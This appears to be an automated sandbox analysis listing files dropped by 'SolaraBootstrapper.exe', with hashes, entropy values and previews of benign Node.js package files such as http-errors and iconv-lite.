                                                  Size (bytes):73
                                                  Entropy (8bit):4.41518243529598
                                                  Encrypted:false
                                                  SSDEEP:3:3Tx+HNNMgv/YGeifEeKTzHJdhvn:DUDMgv/YGeiMeIrJd5n
                                                  MD5:5847303E067654A0B80F57E167D826B6
                                                  SHA1:C50B6B712C9B6393C8B7E0DF8D669B0DE384A6F8
                                                  SHA-256:29EF530207266F2859676C048073E7F746DB37A0A20E2A75BC2EF2B3893FBF40
                                                  SHA-512:78FFB68B7EEC279C103F4FB7268AAEAB6BAF2F5D7F04A4C86C04DA09541BDB2704FEECC7E31CEAE574091A72DB4EA085052879C0DB2881C25723DC323DF4F4CA
                                                  Malicious:false
                                                  Preview:{. "extends": "@ljharb/tsconfig",. "exclude": [. "coverage",. ],.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3973
                                                  Entropy (8bit):4.805304860089398
                                                  Encrypted:false
                                                  SSDEEP:48:HkFw1efvGtc/KUgNbYpX/tz7cRWJfYRgoTDRZktIduWmQdgelPsWJRoQRoN0Gbwl:ETHCFCz7GdgHyuSgelPBoCoPrj4Q6J
                                                  MD5:4D62E58CC4E54263B774E9FEBB8695C9
                                                  SHA1:207589588EDC19ECC77ACDBCA005C7F4DBB5A44E
                                                  SHA-256:990FF24AB4CD1EBF895F185934FC5E15C093AAD29DB8E1F0DB6CB678422EDAEB
                                                  SHA-512:877493F1FF2984298922777D33A16DA77ADD93064EE78F61925205EC4ADD5CDFACA26297C8158C9A704E70AA01D468BD9E001D5E0075FA18D1A60C3527EED4B0
                                                  Malicious:false
                                                  Preview:2.0.0 / 2021-12-17.==================.. * Drop support for Node.js 0.6. * Remove `I'mateapot` export; use `ImATeapot` instead. * Remove support for status being non-first argument. * Rename `UnorderedCollection` constructor to `TooEarly`. * deps: depd@2.0.0. - Replace internal `eval` usage with `Function` constructor. - Use instance methods on `process` to check for listeners. * deps: statuses@2.0.1. - Fix messaging casing of `418 I'm a Teapot`. - Remove code 306. - Rename `425 Unordered Collection` to standard `425 Too Early`..2021-11-14 / 1.8.1.==================.. * deps: toidentifier@1.0.1..2020-06-29 / 1.8.0.==================.. * Add `isHttpError` export to determine if value is an HTTP error. * deps: setprototypeof@1.2.0..2019-06-24 / 1.7.3.==================.. * deps: inherits@2.0.4..2019-02-18 / 1.7.2.==================.. * deps: setprototypeof@1.1.1..2018-09-08 / 1.7.1.==================.. * Fix error creating objects in some environments..2018-07-3
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1168
                                                  Entropy (8bit):5.154750329213657
                                                  Encrypted:false
                                                  SSDEEP:24:8FMp9rmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:8FMp9aJHlxE35QHOs5exm3ogF5n
                                                  MD5:607209623ABFCC77B9098F71A0EF52F9
                                                  SHA1:20AD45BD29ECB3CC6F38A08A27EB09C7B74A1F6D
                                                  SHA-256:DCB94FF9B1E037A847BC20589DC81A1066D041FD4C16DEB18B0FA968C66CF395
                                                  SHA-512:225048FDE7057C55AC4DFB5DAF8A5C42890A2580443993A1656DB80720311B83501242164654146D71D028F3BBA8AB2716296FD7A6DEC1FC49F1B371A8D613E5
                                                  Malicious:false
                                                  Preview:.The MIT License (MIT)..Copyright (c) 2014 Jonathan Ong me@jongleberry.com.Copyright (c) 2016 Douglas Christopher Wilson doug@somethingdoug.com..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHE
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):5962
                                                  Entropy (8bit):4.7551430930121255
                                                  Encrypted:false
                                                  SSDEEP:96:aHo15NuNhRYr1ZNx9UHuDBUM+3cUZzm128SH4mVoP1IINtyXSt9JeHW2z:aHY7r1l9UHuDBUM+3ckm1pPIiUidfo
                                                  MD5:F111CD1BB6B0E560A936C4B00A9C3CE4
                                                  SHA1:35F8D40FB24E822B5CFBC829E5A3FA0E5F90AE3C
                                                  SHA-256:EC2D7A200D4ADF39EBFA7E29F1FB1F45DFB34EC8FE040428F83AA5DAD8948C57
                                                  SHA-512:27493DD888F009F52E6E926D4D9B80F162F50C11534D771F0966D9C9C875FC5738540ADF24DBC0A3E81C7FC248BCC88F10815CBD7308E85360C6B1273CE5EC34
                                                  Malicious:false
                                                  Preview:# http-errors..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][node-url].[![Node.js Version][node-image]][node-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Create HTTP errors for Express, Koa, Connect, etc. with ease...## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```console.$ npm install http-errors.```..## Example..```js.var createError = require('http-errors').var express = require('express').var app = express()..app.use(function (req, res, next) {. if (!req.user) return next(createError(401, 'Please login to view this page.')). next().}).```..## API..This is the current API, currently extracted from Koa and subject to change...### Error Properties..- `expose` - can be used to signal if `messa
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6391
                                                  Entropy (8bit):4.675207843615285
                                                  Encrypted:false
                                                  SSDEEP:192:aQqVdCvgJsEhejmmXs10bxnOdZEhEwl0bxnOp0tOfgt:aQqbCvgJsUkG09nd09ncfa
                                                  MD5:213C0887ADDECC762964DB8CE2030F2F
                                                  SHA1:B8F60A860443B05A62EB6C4EC1C300F1945886F1
                                                  SHA-256:0F484A62F0587E00002F3FD194B1ACA9BCDD1881FCB3250E98B5AC17DF7DD1FD
                                                  SHA-512:D9BB2399C659AF3F9E08763B69119BFF9EEE985EE6DC7185BAF85D59405FCAF765A808FB998553290419B2CF4794543A6FD4517BF338ACDA83F313DA62423150
                                                  Malicious:false
                                                  Preview:/*!. * http-errors. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var deprecate = require('depd')('http-errors').var setPrototypeOf = require('setprototypeof').var statuses = require('statuses').var inherits = require('inherits').var toIdentifier = require('toidentifier')../**. * Module exports.. * @public. */..module.exports = createError.module.exports.HttpError = createHttpErrorConstructor().module.exports.isHttpError = createIsHttpErrorFunction(module.exports.HttpError)..// Populate exports for all constructors.populateConstructorExports(module.exports, statuses.codes, module.exports.HttpError)../**. * Get the code class of a status code.. * @private. */..function codeClass (status) {. return Number(String(status).charAt(0) + '00').}../**. * Create a new HTTP Error.. *. * @returns {Error}. * @public. */..function createError () {. // so much arity going on ~_~. var
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1314
                                                  Entropy (8bit):4.822073227311272
                                                  Encrypted:false
                                                  SSDEEP:24:7D13bYxL+PnDqb0YuNCeRIZBlWi2nfrRQWeLl105P6sKeu:753bGL+PDqYYuNCeRIzUbzje70yeu
                                                  MD5:F44E01D2E815367806C58207AC92A5FC
                                                  SHA1:BCB1768525F7F5E1AF75C272867BFED66DD983C7
                                                  SHA-256:DDA88273810EC9E624BF08D4815CB6AA4007135BF98CE11706D2E1B2F2A6690A
                                                  SHA-512:B8B523CEFE68FC2F4E55AB656F024557DA925360AF9E5ADF9143AE55F7E93E7AD3FE95E7809FD0F7406B500A525C777329EFCE219CFCD0E88B73376D098C08AB
                                                  Malicious:false
                                                  Preview:{. "name": "http-errors",. "description": "Create HTTP error objects",. "version": "2.0.0",. "author": "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)",. "contributors": [. "Alan Plum <me@pluma.io>",. "Douglas Christopher Wilson <doug@somethingdoug.com>". ],. "license": "MIT",. "repository": "jshttp/http-errors",. "dependencies": {. "depd": "2.0.0",. "inherits": "2.0.4",. "setprototypeof": "1.2.0",. "statuses": "2.0.1",. "toidentifier": "1.0.1". },. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.3",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.1.3",. "nyc": "15.1.0". },. "engines": {. "node": ">= 0.8". },. "scripts": {. "lint": "eslint . && node ./scripts/lint-readme-list.js",. "test": "mocha --reporter spec --bail",. "test-ci": "ny
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4342
                                                  Entropy (8bit):5.045844904342997
                                                  Encrypted:false
                                                  SSDEEP:96:AbEHL1ml81arHep4pvo+hjtKIIiT5iGAVzH3o0gNSUaLHQjn/8XKTTSydn:AbEHL+8sHbpvo+eIIw5ivVzH4nN0QDEw
                                                  MD5:11F7C1FC239799DED47D06C8ABD91B9B
                                                  SHA1:DBB28CEBB8AC5C1472D03DF37F937CCAC610BCC3
                                                  SHA-256:0C7C66F8F39354E7B15C4431A95C2BCD40941F9AE8D666EFA8F17AFB97B87C82
                                                  SHA-512:BFFEDAFF4F73D29F4E757C3C1990D0F837A34CD96244F0B6D6B34171B26E507B5BCC62D46AA7A2CD8BB823A99E561136954E5E4020B525A81351A4AF2C2E3337
                                                  Malicious:false
                                                  Preview:# 0.4.24 / 2018-08-22.. * Added MIK encoding (#196, by @Ivan-Kalatchev)...# 0.4.23 / 2018-05-07.. * Fix deprecation warning in Node v10 due to the last usage of `new Buffer` (#185, by @felixbuenemann). * Switched from NodeBuffer to Buffer in typings (#155 by @felixfbecker, #186 by @larssn)...# 0.4.22 / 2018-05-05.. * Use older semver style for dependencies to be compatible with Node version 0.10 (#182, by @dougwilson). * Fix tests to accomodate fixes in Node v10 (#182, by @dougwilson)...# 0.4.21 / 2018-04-06.. * Fix encoding canonicalization (#156). * Fix the paths in the "browser" field in package.json (#174 by @LMLB). * Removed "contributors" section in package.json - see Git history instead....# 0.4.20 / 2018-04-06.. * Updated `new Buffer()` usages with recommended replacements as it's being deprecated in Node v10 (#176, #178 by @ChALkeR)...# 0.4.19 / 2017-09-09.. * Fixed iso8859-1 codec regression in handling untranslatable characters (#162, caused by #147). * Re-generat
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1064
                                                  Entropy (8bit):5.109065218676079
                                                  Encrypted:false
                                                  SSDEEP:24:ciJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFz:ciJzfPvGt7ICQH+sfIte36AFz
                                                  MD5:F942263D98F0D75E0E0101884E86261D
                                                  SHA1:4F3CA49A793F6BB8465A3731FD965A128757B8CE
                                                  SHA-256:AC779F7314C74F232EF847EA86E714ABE25CF6EEB5CC97B69451B74E2AF6492D
                                                  SHA-512:B500B93AE948BE0023297CCD98873B4B8C8A73798326B865EB8D01812F8C22551BF44EADFEEC2ADE17D4AA94BBFBA4A9B456D9737BC7A56ED6D1F913C52613EC
                                                  Malicious:false
                                                  Preview:Copyright (c) 2011 Alexander Shtuchkin..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION.W
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):6534
                                                  Entropy (8bit):5.202264136813618
                                                  Encrypted:false
                                                  SSDEEP:192:jwHaE9jXsiMXsNyHSc18hbhj550/LIO83:nEFXsxRSxg/k3
                                                  MD5:011C8D9193893A9AA6AB12469E808399
                                                  SHA1:8069BC17BDD2FA876E304BAEB37BA82A5046ABC8
                                                  SHA-256:A417C996CEB04E8DBACA5D18187820AFE34CE5105FFD4B7C3EF3C5BEAE298EBA
                                                  SHA-512:D51464C7D3ACA03209411D72F0390EE31732F8CB849CCF08A2379F899768B8A788C11C81A271205FDD3F3D01A9726514935E4096EF6AC252BB5B5CEDAAD192E1
                                                  Malicious:false
                                                  Preview:## Pure JS character encoding conversion [![Build Status](https://travis-ci.org/ashtuchkin/iconv-lite.svg?branch=master)](https://travis-ci.org/ashtuchkin/iconv-lite).. * Doesn't need native code compilation. Works on Windows and in sandboxed environments like [Cloud9](http://c9.io).. * Used in popular projects like [Express.js (body_parser)](https://github.com/expressjs/body-parser), . [Grunt](http://gruntjs.com/), [Nodemailer](http://www.nodemailer.com/), [Yeoman](http://yeoman.io/) and others.. * Faster than [node-iconv](https://github.com/bnoordhuis/node-iconv) (see below for performance comparison).. * Intuitive encode/decode API. * Streaming support for Node v0.10+. * [Deprecated] Can extend Node.js primitives (buffers, streams) to support all iconv-lite encodings.. * In-browser usage via [Browserify](https://github.com/substack/node-browserify) (~180k gzip compressed with Buffer shim included).. * Typescript [type definition file](https://github.com/ashtuchkin/iconv-lite/blob/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):21415
                                                  Entropy (8bit):4.695480882522162
                                                  Encrypted:false
                                                  SSDEEP:384:Kz2XanmPe6rQk8hRVVkhSdj8Wwj4asmTFZy5GlIdnRtMq7/ZxD3ayH:KzTnmPFrQkQVVc4j8Wwj4ITFZqAKnz9n
                                                  MD5:6DECBCDFE2BA5ED5C3A75466CE94CDFC
                                                  SHA1:4EA89EB73A2B3CC3C0CA945280BA2783FCF946BC
                                                  SHA-256:D39BC17F93FC56AF631B00E36542488923378CCE5AD9E7DB48252CE7A1E7B1ED
                                                  SHA-512:18D44778C434F62BF850221056D9B40348E0EEC36C2FDB86CCF0E59ED603687641A60475D8D9C9C553BBC80C8485968291F5CFFB37BCED585A831494AD39C082
                                                  Malicious:false
                                                  Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Multibyte codec. In this scheme, a character is represented by 1 or more bytes..// Our codec supports UTF-16 surrogates, extensions for GB18030 and unicode sequences..// To save memory and loading time, we read table files only when requested...exports._dbcs = DBCSCodec;..var UNASSIGNED = -1,. GB18030_CODE = -2,. SEQ_START = -10,. NODE_START = -1000,. UNASSIGNED_NODE = new Array(0x100),. DEF_CHAR = -1;..for (var i = 0; i < 0x100; i++). UNASSIGNED_NODE[i] = UNASSIGNED;...// Class DBCSCodec reads and initializes mapping tables..function DBCSCodec(codecOptions, iconv) {. this.encodingName = codecOptions.encodingName;. if (!codecOptions). throw new Error("DBCS codec is called without the data."). if (!codecOptions.table). throw new Error("Encoding '" + this.encodingName + "' has no data.");.. // Load tables.. var mappingTable = codecOptions.table();... // Decode tables: MBCS ->
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):8291
                                                  Entropy (8bit):5.146284980949226
                                                  Encrypted:false
                                                  SSDEEP:96:ZeO1igeleOWQSZuMqz7t+zOhbIy3RJ8nhBlulK2KQ+uQ515l66AzCz51nrpMZbzv:kO1kxWQSYJtbV3nYzckvlMZR/HB
                                                  MD5:E56D3D57DF85DC818087254A8A16A699
                                                  SHA1:1CCCEF8583AC6E070E9D911760633CA8D9F7CA8C
                                                  SHA-256:E213F77E926605C30649EA48BCEA851D1EC063BB17FA4C2AB6D3B64853B481AC
                                                  SHA-512:1BC7A9C76CE1F2F971978600D95F777D3B381633C6D1D0C47B224D2BB23752D095C4E4229FF83A0CEA5BA845C608BAD27D31817B55B6845C35E0821A34A51021
                                                  Malicious:false
                                                  Preview:"use strict";..// Description of supported double byte encodings and aliases..// Tables are not require()-d until they are needed to speed up library load..// require()-s are direct to support Browserify...module.exports = {. . // == Japanese/ShiftJIS ====================================================. // All japanese encodings are based on JIS X set of standards:. // JIS X 0201 - Single-byte encoding of ASCII + . + Kana chars at 0xA1-0xDF.. // JIS X 0208 - Main set of 6879 characters, placed in 94x94 plane, to be encoded by 2 bytes. . // Has several variations in 1978, 1983, 1990 and 1997.. // JIS X 0212 - Supplementary plane of 6067 chars in 94x94 plane. 1990. Effectively dead.. // JIS X 0213 - Extension and modern replacement of 0208 and 0212. Total chars: 11233.. // 2 planes, first is superset of 0208, second - revised 0212.. // Introduced in 2000, revised 2004. Some characters are in Unicode Plane 2 (0x2xxxx).
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):710
                                                  Entropy (8bit):4.74427800311378
                                                  Encrypted:false
                                                  SSDEEP:12:uucCK5RHzFLgdrxJvnzqzmYaMmOjsm9XHMuPfsErISeXD7yCQiTJX:SBXHFgJ/fzqzmYGOjsmZIRSdYTJX
                                                  MD5:7A13671A7FBC74C463377B3CDA863503
                                                  SHA1:79E395B6DFAFD0AE516E18C81B828EF3DE0C76AA
                                                  SHA-256:69607A9EE51B63333D0E7EE20A38B52E1E96652A4BBC09C701D70835FBBFE10A
                                                  SHA-512:479FAE492896EC38035777E43DA891322CBD9108D2A9D06BE16B19EFACE2162D6DD34281DF1450D2C877EE55AFBD6818DCC3C4DC9F43940D62A429BF94362257
                                                  Malicious:false
                                                  Preview:"use strict";..// Update this array if you add/rename/remove files in this directory..// We support Browserify by skipping automatic module discovery and requiring modules directly..var modules = [. require("./internal"),. require("./utf16"),. require("./utf7"),. require("./sbcs-codec"),. require("./sbcs-data"),. require("./sbcs-data-generated"),. require("./dbcs-codec"),. require("./dbcs-data"),.];..// Put all encoding/alias/codec definitions to single object and export it. .for (var i = 0; i < modules.length; i++) {. var module = modules[i];. for (var enc in module). if (Object.prototype.hasOwnProperty.call(module, enc)). exports[enc] = module[enc];.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):6115
                                                  Entropy (8bit):4.7023357481323655
                                                  Encrypted:false
                                                  SSDEEP:96:xxjXzBkMDIaChyXR9HJlY5QzkK7b5MhJpBWxGDql+qiQaxd9vDMGEvvDc89yie7e:XXzBkDaChs9HJlY5QzkKH5MhJpkt1iQf
                                                  MD5:701B0858FB6FA82101365D81D7406F04
                                                  SHA1:6B0E421BFD6FA701D0FDB42FBF5A512778774757
                                                  SHA-256:39D9DD0568708A23C5999FCD6C417EC64F35ECBECD37205F91C7C6B59D14D773
                                                  SHA-512:A523014D0EF985FE644578649AA4D2BA5C192959FB7CB93995F5083813F12B8DB6689C0B81CBB5BC411E62E44B1DF9131095D14BB18C3504EB27EC7C32B4ED19
                                                  Malicious:false
                                                  Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Export Node.js internal encodings...module.exports = {. // Encodings. utf8: { type: "_internal", bomAware: true},. cesu8: { type: "_internal", bomAware: true},. unicode11utf8: "utf8",.. ucs2: { type: "_internal", bomAware: true},. utf16le: "ucs2",.. binary: { type: "_internal" },. base64: { type: "_internal" },. hex: { type: "_internal" },.. // Codec.. _internal: InternalCodec,.};..//------------------------------------------------------------------------------..function InternalCodec(codecOptions, iconv) {. this.enc = codecOptions.encodingName;. this.bomAware = codecOptions.bomAware;.. if (this.enc === "base64"). this.encoder = InternalEncoderBase64;. else if (this.enc === "cesu8") {. this.enc = "utf8"; // Use utf8 for decoding.. this.encoder = InternalEncoderCesu8;.. // Add decoder for versions of Node not supporting CESU-8. if (Buffer
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2191
                                                  Entropy (8bit):4.872958302882698
                                                  Encrypted:false
                                                  SSDEEP:48:dzNyvH+G49CEqHbDKuxVyJnV/1OVEq5RMRtRTOfDSx+fEc76Qd:xsY9fubyxV/m/RMrR4DFfSQd
                                                  MD5:6F257833A4D930EAA9AF9225FAEF16B8
                                                  SHA1:D0C2BDE053DCE8027EFF00B2E172CBED45579E6C
                                                  SHA-256:FB511C4C70A6CB0E2A06D03E67CA88DCA9F4DA6266B909C7338E453D2ECC9FDB
                                                  SHA-512:8285675ABD62F7174D2D94C15047B3032E616E73E885F8075B7CA073A59322C391EBD68CA3144BBEB8B06E7026600EF9C3BDE43733F25EB7D6890167D0F907A5
                                                  Malicious:false
                                                  Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Single-byte codec. Needs a 'chars' string parameter that contains 256 or 128 chars that.// correspond to encoded bytes (if 128 - then lower half is ASCII). ..exports._sbcs = SBCSCodec;.function SBCSCodec(codecOptions, iconv) {. if (!codecOptions). throw new Error("SBCS codec is called without the data."). . // Prepare char buffer for decoding.. if (!codecOptions.chars || (codecOptions.chars.length !== 128 && codecOptions.chars.length !== 256)). throw new Error("Encoding '"+codecOptions.type+"' has incorrect 'chars' (must be of len 128 or 256)");. . if (codecOptions.chars.length === 128) {. var asciiString = "";. for (var i = 0; i < 128; i++). asciiString += String.fromCharCode(i);. codecOptions.chars = asciiString + codecOptions.chars;. }.. this.decodeBuf = Buffer.from(codecOptions.chars, 'ucs2');. . // Encoding buffer.. var encodeBuf = Buffer.al
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32034
                                                  Entropy (8bit):6.328773645887887
                                                  Encrypted:false
                                                  SSDEEP:768:j2lyKokKKZ2DVsRUdQJkEkSFnCrHmUFC5uyr:j24MKKRI/fakmU+
                                                  MD5:78C27D9268D36644AC77B82B956F5B1F
                                                  SHA1:8CEB7540842B7FB237391EC3C324035A3FEB7336
                                                  SHA-256:2CF44B3F70C61C9CDD59FDA7EC085BC3180809638F208C7239688CCB90A48866
                                                  SHA-512:AB9154847D29136D4A5E7C7B06105704E6CF42966F26066D87F8E54EB5CE49849757400A9E84E09D8F0C22FFA45F4EDF47339525F8E5DC06FD427DC85A5A3416
                                                  Malicious:false
                                                  Preview:"use strict";..// Generated data for sbcs codec. Don't edit manually. Regenerate using generation/gen-sbcs.js script..module.exports = {. "437": "cp437",. "737": "cp737",. "775": "cp775",. "850": "cp850",. "852": "cp852",. "855": "cp855",. "856": "cp856",. "857": "cp857",. "858": "cp858",. "860": "cp860",. "861": "cp861",. "862": "cp862",. "863": "cp863",. "864": "cp864",. "865": "cp865",. "866": "cp866",. "869": "cp869",. "874": "windows874",. "922": "cp922",. "1046": "cp1046",. "1124": "cp1124",. "1125": "cp1125",. "1129": "cp1129",. "1133": "cp1133",. "1161": "cp1161",. "1162": "cp1162",. "1163": "cp1163",. "1250": "windows1250",. "1251": "windows1251",. "1252": "windows1252",. "1253": "windows1253",. "1254": "windows1254",. "1255": "windows1255",. "1256": "windows1256",. "1257": "windows1257",. "1258": "windows1258",. "28591": "iso88591",. "28592": "iso88592",. "28593": "iso88593",. "28594": "iso88594",. "28595": "iso88595",. "28596": "iso8
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):4686
                                                  Entropy (8bit):5.262297729359287
                                                  Encrypted:false
                                                  SSDEEP:96:xVYsSWJdoczNtWdU2AgpRJhGZfkfbp4gyWDEpqs:nGWFrMYgpPhGZfkfbpSLn
                                                  MD5:336BE4EDA323A03B88D06985F15C3524
                                                  SHA1:B22C786C5CC8A3B58F650E413F7ADE37152CD173
                                                  SHA-256:3116C986BFF5D0B3A0D9EE1700D97AC466965A7B30D353300D408B41622604C2
                                                  SHA-512:68C8BA39F66720A462415E372A8C0B2FBBDB85C4957E37D7A525A8726F23DE6808812BD753FCC8BA6500F8FD0AA91A532B5F8418233EC4FB2CCD626F42215B2E
                                                  Malicious:false
                                                  Preview:"use strict";..// Manually added data to be used by sbcs codec in addition to generated one...module.exports = {. // Not supported by iconv, not sure why.. "10029": "maccenteuro",. "maccenteuro": {. "type": "_sbcs",. "chars": "................................................................................................................................". },.. "808": "cp808",. "ibm808": "cp808",. "cp808": {. "type": "_sbcs",. "chars": "................................................................................................................................". },.. "mik": {. "type": "_sbcs",.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):17717
                                                  Entropy (8bit):6.109390635315052
                                                  Encrypted:false
                                                  SSDEEP:384:UdWyG4Gg/Dutxccky/pqyPtayOsXO5jrzVqMgoeeJJ5guJ3i:R4ovk+nPJOsov5qEeeJJK3
                                                  MD5:F29EDA07F68F9E3F234638D42956F9AB
                                                  SHA1:E61B2D77A36BCE976F563F659300E06A33C9E6E9
                                                  SHA-256:DB94DB5E5D3AB696DDB0025685CFA85DA1864839A4A26AAB2F8F86F6B8382288
                                                  SHA-512:AC83EF6C09AF9258273B586B0B33614B6DA6759930A23BCBF1D0E5428AFC076767916BC49B04A98A1BF952B8E8F9CB0F81283D747A724AF01162DBA184079BE4
                                                  Malicious:false
                                                  Preview:[.["8740","....................................................."],.["8767","................................"],.["87a1","................................................................................"],.["8840",".",4,"....................................................................."],.["88a1",".............."],.["8940","...."],.["8943","."],.["8946","...."],.["894c","...................................................."],.["89a1","......"],.["89ab","...."],.["89b0","...."],.["89b5","...
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):47320
                                                  Entropy (8bit):5.975707024029791
                                                  Encrypted:false
                                                  SSDEEP:768:qHRrIrFlXsioCUVgEHFrg232EXPIOqqGBMhHoVE9OfZ+mssnXpOH:qhI5aHCU7HFrtXPgqGOxbU5E
                                                  MD5:9EAE47ACF0B20461508FDC4506BD905E
                                                  SHA1:22B95CE3E9743DC8DF815B8A6B9C13D1A9F7C229
                                                  SHA-256:8225BB693EFD380279ED7280B8F8419FD069C5F018D20D5946BF187AD92C0CF7
                                                  SHA-512:781667081C82281F69334D917C53ED81A7D283C0B7CCD5C393591790A746C9C0096265403F28555157340C69E37A340BCEE23C3E27AA0BD9A7203D5FC81FDE74
                                                  Malicious:false
                                                  Preview:[.["0","\u0000",127,"."],.["8140","......................................",5,"..",9,".",6,".."],.["8180",".............................................",6,"...",4,"................",4,"...",5,"........................................."],.["8240","....",4,".",8,"...........",4,"....................",11],.["8280","..................",10,"..............",4,"......",7,".",5,".",8,"................",20,".....",4,".",6,"."],.["8340",".",17,".",5,"....",10,".........."
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):38122
                                                  Entropy (8bit):6.187510295563581
                                                  Encrypted:false
                                                  SSDEEP:768:VY4aBEddk76wYCuos24JmKyOgGcIFWS5gGMY5u0v5uXV4siZoCTQtPAFRp:C4a+jjwYfodOmKyOgGcIQS5gg5r+iZo2
                                                  MD5:D99876B274D44FC737C8495BA36B3784
                                                  SHA1:A3A6E6F61A78B50E54947F11CE8DAEBB8756209D
                                                  SHA-256:77A56EA83D0D94D1DC620042AD3C897F0E40814BB05C0085D3AEED0018E8A3E8
                                                  SHA-512:308E4A1051163AA335DE4A255689C579488CB0A01EFFC4CF57392C0F429BBFCAD466F698614EBBFAE38782BD6DED091DEAB012196605CA023E26B6A1C45C900C
                                                  Malicious:false
                                                  Preview:[.["0","\u0000",127],.["8141",".....",4,".......",6,"...."],.["8161",".........",9,"..",5,"."],.["8181","......",18,"......",4,"..........",6,"..",5,"....",6,".............",7,"..",7,"...........",4,".......",4,"...."],.["8241","...........",7,"...",5],.["8261","......",6,"...",5,"......"],.["8281",".",7,"..",7,"...........",4,"......",10,".",5,".",17,".",7,"......",6,"..",7,".......",18],.["8341",".....",5,"...",5,".",7],.["8361",".",18,"......."],.["8381","...............",4,"............",6,"..",5,".",5,".",46,".....",6,"..",5,"...",8],.["8441","...
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):42356
                                                  Entropy (8bit):5.945150159976492
                                                  Encrypted:false
